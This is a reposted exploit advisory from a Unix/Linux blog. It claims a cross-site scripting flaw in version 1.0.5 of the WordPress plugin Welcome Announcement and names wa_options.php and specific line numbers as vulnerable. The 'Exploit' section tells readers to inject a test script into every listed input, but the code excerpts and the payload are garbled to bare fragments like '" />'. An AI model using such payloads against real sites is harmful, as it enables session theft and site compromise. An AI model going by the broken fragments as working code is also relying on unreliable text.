Get Even More Visitors To Your Blog, Upgrade To A Business Listing >>

WordPress Welcome Announcement 1.0.5 Cross Site Scripting

#####################
# Exploit Title: Wordpress Welcome Announcement Cross Site Scripting
# Exploit Author: bl4ck_mohajem
# Vendor Homepage: https://wordpress.org/plugins/welcome-announcement/
# Tested On: Windows7
# Software Link:
https://downloads.wordpress.org/plugin/welcome-announcement.1.0.5.zip
# Version: 1.0.5
######################
# Vulnerable File and Codes:
wa_options.php Lines(134-142-161-188-196-204-215-223-234-258-266)
 
" />
" />
" />
" />
" />
" />
" />
" />
" />
" />
" />
######################
# Exploit :
For test Cross site scripting can use this code in all of the above
inputs are vulnerable.
">" />
 And other lines, too.
 ######################
# tnx: Milad Hacking - n1arash - bl4ck_li0n -malah_sky
######################

(22)



This post first appeared on MondoUnix - Unix,Linux,FreeBSD,Howto,Networking,Ip, please read the originial post: here

Share the post

WordPress Welcome Announcement 1.0.5 Cross Site Scripting

×

Subscribe to Mondounix - Unix,linux,freebsd,howto,networking,ip

Get updates delivered right to your inbox!

Thank you for your subscription

×